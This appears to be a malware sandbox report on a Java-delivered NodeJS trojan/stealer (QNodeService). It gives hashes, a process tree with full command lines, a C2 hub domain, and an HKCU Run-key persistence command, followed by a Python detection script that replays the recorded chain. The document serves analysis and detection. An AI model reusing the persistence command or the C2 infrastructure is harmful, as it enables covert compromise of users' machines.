Analysis
- max time kernel: 51s
- max time network: 148s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 06-11-2020 10:36
- Static task: static1
- Behavioral task behavioral1: sample "Statement 04 Oct-20.img.jar", resource win7v20201028
- Behavioral task behavioral2: sample "Statement 04 Oct-20.img.jar", resource win10v20201028
General
- Target: Statement 04 Oct-20.img.jar
- Size: 95KB
- MD5: 67dcde7d0220354ccabc329fbe056af6
- SHA1: e22bc9ad2f1da67d9ede5ad163cdcd158df6ff36
- SHA256: dc33943acfaeb2b98b0798c8b87d11037354deb8a324a21062f9098fb1b3922e
- SHA512: cb3e662e7aa7015f2c5d734ee481121762a84c536f956d57bbdcaa038bab6a4a62a69d004dd1987dc0b439343f81ee494d8e6aef9a5db761373f43176b96c2ef
Malware Config
Signatures
- QNodeService
  Trojan/stealer written in NodeJS and spread via a Java downloader.

- Executes dropped EXE (3 IoCs)
  pid  | Process
  156  | node.exe
  2180 | node.exe
  3592 | node.exe

- Adds Run key to start application (2 TTPs, 2 IoCs)
  description     | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\9548c053-87e3-4b53-b155-c388d3969fbe = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe
  Key created     | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
  The value name is a GUID with no descriptive meaning, and the data relaunches the implant at every logon of this user by running boot.vbs through cmd.exe. The persistence lives under HKCU, so it needs no elevation and is missed by checks that only inspect HKLM.

- JavaScript code in executable (3 IoCs)
  resource                                     | yara_rule
  behavioral2/files/0x000100000001ab96-169.dat | js
  behavioral2/files/0x000100000001ab96-172.dat | js
  behavioral2/files/0x000100000001ab96-176.dat | js

- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  23   | wtfismyip.com
  24   | wtfismyip.com

- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description       | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
  Caveat: ProcessorNameString and ~MHz under CentralProcessor\N are exactly the values libuv reads to serve Node's os.cpus(), so for a Node.js payload these reads are equally consistent with plain host fingerprinting; treat them as weak evidence of sandbox evasion on their own.

- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid  | Process  | entries
  156  | node.exe | 4
  2180 | node.exe | 4
  3592 | node.exe | 10

- Suspicious use of WriteProcessMemory (12 IoCs)
  Each event below is recorded twice in the report. procid_target is the sandbox's internal id of the target process, not its Windows PID.
  description                       | pid  | Process   | procid_target
  PID 1180 wrote to memory of 1084  | 1180 | java.exe  | 77
  PID 1084 wrote to memory of 156   | 1084 | javaw.exe | 81
  PID 156 wrote to memory of 2180   | 156  | node.exe  | 83
  PID 2180 wrote to memory of 3592  | 2180 | node.exe  | 84
  PID 3592 wrote to memory of 3868  | 3592 | node.exe  | 86
  PID 3868 wrote to memory of 2584  | 3868 | cmd.exe   | 87
Processes
Chain as recorded: java.exe runs the submitted JAR, which hands a second JAR staged as C:\Users\Admin\AppData\Local\Temp\2fb4f4fa.tmp to javaw.exe; that stage launches a Node.js 14.12.0 runtime unpacked in the user profile with --hub-domain manhasnoplug.ddns.net, which re-executes itself through boot.js twice and finally persists by writing a Run value that starts C:\Users\Admin\qhub\node\2.0.10\boot.vbs through cmd.exe. The write of boot.vbs itself is not among the signatures above, so confirm that path on a live host rather than assuming it from the Run value. Depth numbers below are the parent/child nesting levels.

1. C:\ProgramData\Oracle\Java\javapath\java.exe
   Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\Statement 04 Oct-20.img.jar"
   PID: 1180
   - Suspicious use of WriteProcessMemory
   2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2fb4f4fa.tmp
      PID: 1084
      - Suspicious use of WriteProcessMemory
      3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain manhasnoplug.ddns.net
         PID: 156
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory
         4. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_SJ71pq\boot.js --hub-domain manhasnoplug.ddns.net
            PID: 2180
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory
            5. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
               Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_SJ71pq\boot.js --hub-domain manhasnoplug.ddns.net
               PID: 3592
               - Executes dropped EXE
               - Checks processor information in registry
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of WriteProcessMemory
               6. C:\Windows\system32\cmd.exe
                  Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9548c053-87e3-4b53-b155-c388d3969fbe" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
                  PID: 3868
                  - Suspicious use of WriteProcessMemory
                  7. C:\Windows\system32\reg.exe
                     Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9548c053-87e3-4b53-b155-c388d3969fbe" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                     PID: 2584
                     - Adds Run key to start application
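The two behaviours worth alerting on in this chain are a node.exe launched by java/javaw from a user-writable path, and a REG ADD into the HKCU Run key whose data starts a script file. The block below is an added example written for this page, not code from the sandbox or from QNodeService: it runs those rules, plus a lineage check that ties them together, over process-creation records constructed from the tree above. The record layout (pid, ppid, image, cmdline) is an assumption modelled on a Sysmon process-creation event, the benign node.exe control process and the root PIDs 900 and 3000 are invented, and the hub-domain extraction is for IoC enrichment rather than detection.

```python
"""Detection rules for the QNodeService process chain (added example; the
event layout is an assumption modelled on Sysmon Event ID 1 records)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample: the report's chain plus one benign node.exe as a control.
# Parent PIDs 900 and 3000 and the control process 4100 are invented.
EVENTS = [
    ProcEvent(1180, 900, r"C:\ProgramData\Oracle\Java\javapath\java.exe",
              r'java -jar "C:\Users\Admin\AppData\Local\Temp\Statement 04 Oct-20.img.jar"'),
    ProcEvent(1084, 1180, r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
              r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2fb4f4fa.tmp'),
    ProcEvent(156, 1084, r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
              r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain manhasnoplug.ddns.net"),
    ProcEvent(2180, 156, r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
              r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_SJ71pq\boot.js --hub-domain manhasnoplug.ddns.net"),
    ProcEvent(3592, 2180, r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
              r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_SJ71pq\boot.js --hub-domain manhasnoplug.ddns.net"),
    ProcEvent(3868, 3592, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9548c053-87e3-4b53-b155-c388d3969fbe" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""'),
    ProcEvent(2584, 3868, r"C:\Windows\system32\reg.exe",
              r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9548c053-87e3-4b53-b155-c388d3969fbe" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""'),
    ProcEvent(4100, 3000, r"C:\Program Files\nodejs\node.exe",
              r'"C:\Program Files\nodejs\node.exe" server.js'),
]

RUN_KEY = re.compile(r"\bREG\s+ADD\b.*?\\CurrentVersion\\Run\b", re.I)
VALUE_NAME = re.compile(r'/V\s+"?([^"\s]+)', re.I)
SCRIPT_PAYLOAD = re.compile(r"\.(?:vbs|vbe|js|jse|wsf|bat|cmd|ps1)\b", re.I)
GUID = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
HUB_DOMAIN = re.compile(r"--hub-domain\s+(\S+)")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def by_pid(events):
    return {e.pid: e for e in events}


def lineage(pid, events):
    """Image basenames from pid up to the highest ancestor we have (child first)."""
    table, names, seen = by_pid(events), [], set()
    ev = table.get(pid)
    while ev is not None and ev.pid not in seen:  # guard against PID-reuse loops
        seen.add(ev.pid)
        names.append(basename(ev.image))
        ev = table.get(ev.ppid)
    return names


def java_spawned_node(events):
    """Rule 1: node.exe started by java/javaw from a user-writable path."""
    table, hits = by_pid(events), []
    for ev in events:
        parent = table.get(ev.ppid)
        if (basename(ev.image) == "node.exe"
                and parent is not None
                and basename(parent.image) in ("java.exe", "javaw.exe")
                and ev.image.lower().startswith("c:\\users\\")):
            hits.append(ev.pid)
    return hits


def run_key_script_persistence(events):
    """Rule 2: REG ADD into a CurrentVersion\\Run key whose data launches a script."""
    hits = []
    for ev in events:
        if not RUN_KEY.search(ev.cmdline):
            continue
        m = VALUE_NAME.search(ev.cmdline)
        name = m.group(1) if m else ""
        hits.append({"pid": ev.pid, "value_name": name,
                     "guid_name": bool(GUID.fullmatch(name)),
                     "script_payload": bool(SCRIPT_PAYLOAD.search(ev.cmdline))})
    return hits


def persistence_from_java_chain(events):
    """Rule 3: a Rule-2 hit whose ancestry passes through a Rule-1 node.exe."""
    suspicious, table, out = set(java_spawned_node(events)), by_pid(events), []
    for hit in run_key_script_persistence(events):
        pids, ev = [], table.get(hit["pid"])
        while ev is not None and ev.pid not in pids:
            pids.append(ev.pid)
            ev = table.get(ev.ppid)
        if suspicious & set(pids):
            out.append({**hit, "lineage": lineage(hit["pid"], events)})
    return out


def hub_domains(events):
    """IoC enrichment: collect --hub-domain arguments from node.exe command lines."""
    found = {m.group(1) for e in events if basename(e.image) == "node.exe"
             for m in [HUB_DOMAIN.search(e.cmdline)] if m}
    return sorted(found)


if __name__ == "__main__":
    for hit in persistence_from_java_chain(EVENTS):
        print(hit)
    print("hub domains:", hub_domains(EVENTS))
```

Rule 1 keys on the parent image and the install path rather than on the hub domain, so it survives a C2 change and does not fire on a developer's node.exe under Program Files. Rule 3 fires twice because both the cmd.exe wrapper and reg.exe carry the REG ADD command line; deduplicate on value_name if one alert per host is wanted.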